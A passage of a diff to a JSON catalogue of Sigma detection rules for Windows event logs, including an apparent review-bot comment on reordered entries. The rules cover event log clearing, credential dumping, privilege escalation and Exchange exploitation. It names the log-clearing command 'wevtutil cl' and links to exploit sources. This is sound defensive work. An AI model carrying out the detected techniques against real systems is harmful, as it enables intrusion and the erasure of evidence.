exploitation of a NTFS vulnerability as reported without many details via Twitter", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/01/11", + "falsepositive": [ + "Unlikely" + ], + "filename": "win_system_ntfs_vuln_exploit.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/wdormann/status/1347958161609809921", + "https://www.bleepingcomputer.com/news/security/windows-10-bug-corrupts-your-hard-drive-on-seeing-this-files-icon/", + "https://twitter.com/jonasLyk/status/1347900440000811010", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_ntfs_vuln_exploit.yml" + ], + "tags": [ + "attack.impact", + "attack.t1499.001" + ] + }, + "uuid": "f14719ce-d3ab-4e25-9ce6-2899092260b0", + "value": "NTFS Vulnerability Exploitation" + }, + { + "description": "This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/31", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_apt_carbonpaper_turla.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_apt_carbonpaper_turla.yml" + ], + "tags": [ + "attack.persistence", + "attack.g0010", + "attack.t1543.003" + ] + }, + "uuid": "1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4", + "value": "Turla Service Install" + }, + { + "description": "One of the Windows Core Eventlogs has been cleared. e.g. 
caused by \"wevtutil cl\" command execution", + "meta": { + "author": "Florian Roth, Tim Shelton", + "creation_date": "2022/05/17", + "falsepositive": [ + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" + ], + "filename": "win_system_susp_eventlog_cleared.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100", + "https://twitter.com/deviouspolack/status/832535435960209408", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_eventlog_cleared.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.001", + "car.2016-04-002" + ] + }, + "uuid": "100ef69e-3327-481c-8e5c-6d80d9507556", + "value": "System Eventlog Cleared" + }, + { + "description": "This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded", + "meta": { + "author": "Dimitrios Slamaris, @atc_project (fix)", + "creation_date": "2017/05/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_susp_dhcp_config_failed.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", + "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", + "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_dhcp_config_failed.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "75edd3fd-7146-48e5-9848-3013d7f0282c", + "value": "DHCP Server Error Failed Loading the CallOut DLL" + }, + { + "description": 
"During exploitation of this vuln, two logs (providername:Microsoft-Windows-User Profiles Service) with eventid 1511 and 1515 (maybe lot of false positives with this event) are created. Moreover, it appears the directory \\Users\\TEMP is created may be created during the exploitation.Viewed on 2008 Server", + "meta": { + "author": "Cybex", + "creation_date": "2022/08/16", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://packetstormsecurity.com/files/166692/Windows-User-Profile-Service-Privlege-Escalation.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "52a85084-6989-40c3-8f32-091e12e17692", + "value": "Suspicious Usage of CVE_2021_34484 or CVE 2022_21919" + }, + { + "description": "Detects suspicious service installation scripts", + "meta": { + "author": "pH-T", + "creation_date": "2022/03/18", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_susp_service_installation_script.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_service_installation_script.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" + ] + }, + "uuid": "70f00d10-60b2-4f34-b9a0-dc3df3fe762a", + "value": "Suspicious Service Installation Script" + }, + { + "description": "Detects volume shadow copy mount via windows event log", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "creation_date": "2020/10/20", + "falsepositive": [ + "Legitimate use of volume shadow copy mounts 
(backups maybe)." + ], + "filename": "win_system_volume_shadow_copy_mount.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_volume_shadow_copy_mount.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ] + }, + "uuid": "f512acbf-e662-4903-843e-97ce4652b740", + "value": "Volume Shadow Copy Mount" + }, + { + "description": "Detects suspicious service installation commands", + "meta": { + "author": "pH-T", + "creation_date": "2022/03/18", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_susp_service_installation.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_service_installation.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" + ] + }, + "uuid": "1d61f71d-59d2-479e-9562-4ff5f4ead16b", + "value": "Suspicious Service Installation" + }, + { + "description": "Detects a TacticalRMM service installation. 
Tactical RMM is a remote monitoring & management tool.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/11/28", + "falsepositive": [ + "Legitimate use of the tool" + ], + "filename": "win_system_service_install_tacticalrmm.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_tacticalrmm.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "4bb79b62-ef12-4861-981d-2aab43fab642", + "value": "TacticalRMM Service Installation" + }, + { + "description": "This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/07", + "falsepositive": [ + "Unlikely" + ], + "filename": "win_system_apt_stonedrill.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_apt_stonedrill.yml" + ], + "tags": [ + "attack.persistence", + "attack.g0064", + "attack.t1543.003" + ] + }, + "uuid": "9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6", + "value": "StoneDrill Service Install" + }, + { + "description": "Detects well-known credential dumping tools execution via service execution events", + "meta": { + "author": "Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2017/03/05", + "falsepositive": [ + "Legitimate Administrator using credential dumping tool for password recovery" + ], + "filename": "win_system_mal_creddumper.yml", + 
"level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_mal_creddumper.yml" + ], + "tags": [ + "attack.credential_access", + "attack.execution", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006", + "attack.t1569.002", + "attack.s0005" + ] + }, + "uuid": "4976aa50-8f41-45c6-8b15-ab3fc10e79ed", + "value": "Credential Dumping Tools Service Execution - System" + }, + { + "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques", + "meta": { + "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate OpenVPN TAP insntallation" + ], + "filename": "win_system_tap_driver_installation.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_tap_driver_installation.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048" + ] + }, + "uuid": "8e4cf0e5-aa5d-4dc3-beff-dc26917744a9", + "value": "Tap Driver Installation" + }, + { + "description": "Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018", + "meta": { + "author": "Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2018/03/23", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_apt_chafer_mar18_system.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_apt_chafer_mar18_system.yml" + ], + "tags": [ + "attack.persistence", + "attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", + "attack.defense_evasion", + "attack.t1112", + "attack.command_and_control", + "attack.t1071.004" + ] + }, + "uuid": "53ba33fd-3a50-4468-a5ef-c583635cfa92", + "value": "Chafer Activity - System" + }, + { + "description": "Detects service creation from KrbRelayUp tool used for privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings)", + "meta": { + "author": "Sittikorn S, Tim Shelton", + "creation_date": "2022/05/11", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_krbrelayup_service_installation.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Dec0ne/KrbRelayUp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_krbrelayup_service_installation.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543" + ] + }, + "uuid": "e97d9903-53b2-41fc-8cb9-889ed4093e80", + "value": "KrbRelayUp Service Installation" + }, + { + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_invoke_obfuscation_via_use_mshta_services.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_use_mshta_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": 
"7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4", + "value": "Invoke-Obfuscation Via Use MSHTA - System" + }, + { + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_invoke_obfuscation_via_use_clip_services.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_use_clip_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "63e3365d-4824-42d8-8b82-e56810fefa0c", + "value": "Invoke-Obfuscation Via Use Clip - System" + }, + { + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_invoke_obfuscation_clip_services.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_clip_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "f7385ee2-0e0c-11eb-adc1-0242ac120002", + "value": "Invoke-Obfuscation CLIP+ Launcher - System" + }, + { + "description": "Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/10/07", + "falsepositive": [ + "Unknown" + ], + "filename": 
"win_system_lpe_indicators_tabtip.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/antonioCoco/JuicyPotatoNG",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_lpe_indicators_tabtip.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1557.001"
+ ]
+ },
+ "uuid": "bc2e25ed-b92b-4daa-b074-b502bdd1982b",
+ "value": "Local Privilege Escalation Indicator TabTip"
+ },
+ {
+ "description": "Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.",
+ "meta": {
+ "author": "NVISO",
+ "creation_date": "2020/09/15",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "win_system_vul_cve_2020_1472.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_vul_cve_2020_1472.yml"
+ ],
+ "tags": [
+ "attack.privilege_escalation",
+ "attack.t1548"
+ ]
+ },
+ "uuid": "a0cb7110-edf0-47a4-9177-541a4083128a",
+ "value": "Vulnerable Netlogon Secure Channel Connection Allowed"
+ },
+ {
+ "description": "Detects PsExec service installation and execution events (service and Sysmon)",
+ "meta": {
+ "author": "Thomas Patzke",
+ "creation_date": "2017/06/12",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "win_system_service_install_psexec.yml",
+ "level": "low",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://jpcertcc.github.io/ToolAnalysisResultSheet",
+ "https://www.jpcert.or.jp/english/pub/sr/ir_research.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_psexec.yml"
+ ],
+ "tags": [
+ 
"attack.execution",
+ "attack.t1569.002",
+ "attack.s0029"
+ ]
+ },
+ "uuid": "42c575ea-e41e-41f1-b248-8093c3e82a28",
+ "value": "PsExec Service Installation"
+ },
+ {
+ "description": "Detects service installation with suspicious folder patterns",
+ "meta": {
+ "author": "pH-T",
+ "creation_date": "2022/03/18",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "win_system_susp_service_installation_folder_pattern.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_service_installation_folder_pattern.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.privilege_escalation",
+ "car.2013-09-005",
+ "attack.t1543.003"
+ ]
+ },
+ "uuid": "1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2",
+ "value": "Service Installation with Suspicious Folder Pattern"
+ },
+ {
+ "description": "Detects Remote Utilities Host service installation on the target system.",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/10/31",
+ "falsepositive": [
+ "Legitimate use of the tool"
+ ],
+ "filename": "win_system_service_install_remote_utilities.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.remoteutilities.com/support/kb/host-service-won-t-start/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_remote_utilities.yml"
+ ],
+ "tags": [
+ "attack.persistence"
+ ]
+ },
+ "uuid": "85cce894-dd8b-4427-a958-5cc47a4dc9b9",
+ "value": "Remote Utilities Host Service Install"
+ },
+ {
+ "description": "The attacker creates a computer object using those permissions with a password known to her.\nAfter that she clears the attribute ServicePrincipalName on the computer object.\nBecause she created the object (CREATOR OWNER), she gets granted additional permissions and can do many 
changes to the object.\n",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2021/12/15",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "win_system_vul_cve_2021_42278_or_cve_2021_42287.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://cloudbrothers.info/en/exploit-kerberos-samaccountname-spoofing/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_vul_cve_2021_42278_or_cve_2021_42287.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1558.003"
+ ]
+ },
+ "uuid": "44bbff3e-4ca3-452d-a49a-6efa4cafa06f",
+ "value": "Exploit SamAccountName Spoofing with Kerberos"
+ },
+ {
+ "description": "Rule to detect the Hybrid Connection Manager service running on an endpoint.",
+ "meta": {
+ "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)",
+ "creation_date": "2021/04/12",
+ "falsepositive": [
+ "Legitimate use of Hybrid Connection Manager via Azure function apps." 
+ ],
+ "filename": "win_hybridconnectionmgr_svc_running.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://twitter.com/Cyb3rWard0g/status/1381642789369286662",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/servicebus/win_hybridconnectionmgr_svc_running.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1554"
+ ]
+ },
+ "uuid": "b55d23e5-6821-44ff-8a6e-67218891e49f",
+ "value": "HybridConnectionManager Service Running"
+ },
+ {
+ "description": "Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/08/03",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "win_security_mitigations_unsigned_dll_from_susp_location.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/nasbench/EVTX-ETW-Resources/blob/45fd5be71a51aa518b1b36d4e1f36af498084e27/ETWEventsList/CSV/Windows11/21H2/W11_21H2_Pro_20220719_22000.795/Providers/Microsoft-Windows-Security-Mitigations.csv",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1574.002"
+ ]
+ },
+ "uuid": "8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10",
+ "value": "Unsigned Binary Loaded From Suspicious Location"
+ },
+ {
+ "description": "Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL",
+ "meta": {
+ "author": "Bhabesh Raj",
+ "creation_date": "2022/08/02",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "win_security_mitigations_defender_load_unsigned_dll.yml",
+ "level": "high",
+ "logsource.category": "No established 
category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1574.002"
+ ]
+ },
+ "uuid": "0b0ea3cc-99c8-4730-9c53-45deee2a4c86",
+ "value": "Microsoft Defender Blocked from Loading Unsigned DLL"
+ },
+ {
+ "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.",
+ "meta": {
+ "author": "Tim Burrell",
+ "creation_date": "2020/02/07",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "win_dns_analytic_apt_gallium.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/",
+ "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_server_analytic/win_dns_analytic_apt_gallium.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.command_and_control",
+ "attack.t1071"
+ ]
+ },
+ "uuid": "3db10f25-2527-4b79-8d4b-471eb900ee29",
+ "value": "GALLIUM Artefacts - Builtin"
+ },
+ {
+ "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.",
+ "meta": {
+ "author": "Florian Roth, Gleb Sukhodolskiy, Timur Zinniatullin oscd.community",
+ "creation_date": "2017/08/22",
+ "falsepositive": [
+ "Unknown (data set is too small; further testing needed)"
+ ],
+ "filename": "win_wmi_persistence.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ 
"refs": [
+ "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/",
+ "https://twitter.com/mattifestation/status/899646620148539397",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/wmi/win_wmi_persistence.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.privilege_escalation",
+ "attack.t1546.003"
+ ]
+ },
+ "uuid": "0b7889b4-5577-4521-a60a-3376ee7f9f7b",
+ "value": "WMI Persistence"
+ },
+ {
+ "description": "Detect run not allowed files. Applocker is a very useful tool, especially on servers where unprivileged users have access. For example terminal servers. You need configure applocker and log collect to receive these events.",
+ "meta": {
+ "author": "Pushkarev Dmitry",
+ "creation_date": "2020/06/28",
+ "falsepositive": [
+ "Need tuning applocker or add exceptions in SIEM"
+ ],
+ "filename": "win_applocker_file_was_not_allowed_to_run.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://nxlog.co/documentation/nxlog-user-guide/applocker.html",
+ "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/using-event-viewer-with-applocker",
+ "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/applocker/win_applocker_file_was_not_allowed_to_run.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1204.002",
+ "attack.t1059.001",
+ "attack.t1059.003",
+ "attack.t1059.005",
+ "attack.t1059.006",
+ "attack.t1059.007"
+ ]
+ },
+ "uuid": "401e5d00-b944-11ea-8f9a-00163ecd60ae",
+ "value": "File Was Not Allowed To Run"
+ },
+ {
+ "description": "Detects potential Active Directory enumeration via LDAP",
 "meta": {
 "author": "Adeem Mawani",
 "creation_date": "2021/06/22",
@@ -14289,9 +10500,11 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726",
- "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/Recon/PowerView.ps1",
 "https://github.com/BloodHoundAD/SharpHound3/blob/7d96b991b1887ff50349ce59c80980bc0d95c86a/SharpHound3/LdapBuilder.cs",
+ "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/Recon/PowerView.ps1",
+ "https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726",
+ "https://github.com/fox-it/BloodHound.py/blob/d65eb614831cd30f26028ccb072f5e77ca287e0b/bloodhound/ad/domain.py#L427",
+ "https://medium.com/falconforce/falconfriday-detecting-active-directory-data-collection-0xff21-c22d1a57494c",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ldap/win_ldap_recon.yml"
 ],
 "tags": [
@@ -14302,7 +10515,31 @@
 ]
 },
 "uuid": "31d68132-4038-47c7-8f8e-635a39a7c174",
- "value": "LDAP Reconnaissance / Active Directory Enumeration"
+ "value": "Potential Active Directory Reconnaissance/Enumeration Via LDAP"
+ },
+ {
+ "description": "Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit",
+ "meta": {
+ "author": "Christian Burkard",
+ "creation_date": "2021/08/27",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "win_exchange_proxyshell_remove_mailbox_export.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/rapid7/metasploit-framework/blob/1416b5776d963f21b7b5b45d19f3e961201e0aed/modules/exploits/windows/http/exchange_proxyshell_rce.rb#L430",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_proxyshell_remove_mailbox_export.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1070"
+ ]
+ },
+ "uuid": "09570ae5-889e-43ea-aac0-0e1221fb3d95",
+ "value": "Remove Exported Mailbox from Exchange Webserver"
 },
 {
 "description": "Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321",
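Review bot: The entry added in this hunk (uuid `09570ae5-889e-43ea-aac0-0e1221fb3d95`) is the same entry removed verbatim in the hunk `@@ -14400,54 +10685,6 @@`, and the two entries added in `@@ -14328,6 +10565,54 @@` are likewise removed there, so those three hunks are a pure relocation of unchanged cluster values; the reference reorder in `@@ -14289,9 +10500,11 @@` looks like the same kind of churn. The resulting order appears to follow whatever sequence the generator enumerated the rule files in, which is not stable across filesystems, so every regeneration risks a diff of this size. If the generating script lives in the repository, sorting the `values` array by `filename` (or `uuid`) before serialising would make re-runs produce minimal diffs and leave the one substantive change here, the `value` rename to `Potential Active Directory Reconnaissance/Enumeration Via LDAP`, visible on its own. The `uuid` fields survive the move, so consumers that key on uuid are unaffected by the reorder.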
@@ -14328,6 +10565,54 @@
 "uuid": "c92f1896-d1d2-43c3-92d5-7a5b35c217bb",
 "value": "Possible Exploitation of Exchange RCE CVE-2021-42321"
 },
+ {
+ "description": "Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log",
+ "meta": {
+ "author": "Jose Rodriguez @Cyb3rPandaH",
+ "creation_date": "2021/03/15",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "win_exchange_set_oabvirtualdirectory_externalurl.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://twitter.com/OTR_Community/status/1371053369071132675",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_set_oabvirtualdirectory_externalurl.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1505.003"
+ ]
+ },
+ "uuid": "9db37458-4df2-46a5-95ab-307e7f29e675",
+ "value": "Exchange Set OabVirtualDirectory ExternalUrl Property"
+ },
+ {
+ "description": "Detects a failed installation of a Exchange Transport Agent",
+ "meta": {
+ "author": "Tobias Michalski",
+ "creation_date": "2021/06/08",
+ "falsepositive": [
+ "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this."
+ ],
+ "filename": "win_exchange_transportagent_failed.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://twitter.com/blueteamsec1/status/1401290874202382336?s=20",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_transportagent_failed.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1505.002"
+ ]
+ },
+ "uuid": "c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa",
+ "value": "Failed MSExchange Transport Agent Installation"
+ },
 {
 "description": "Detects specific patterns found after a successful ProxyLogon exploitation in relation to a Commandlet invocation of Set-OabVirtualDirectory",
 "meta": {
@@ -14400,54 +10685,6 @@
 "uuid": "516376b4-05cd-4122-bae0-ad7641c38d48",
 "value": "Mailbox Export to Exchange Webserver"
 },
- {
- "description": "Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit",
- "meta": {
- "author": "Christian Burkard",
- "creation_date": "2021/08/27",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "win_exchange_proxyshell_remove_mailbox_export.yml",
- "level": "high",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
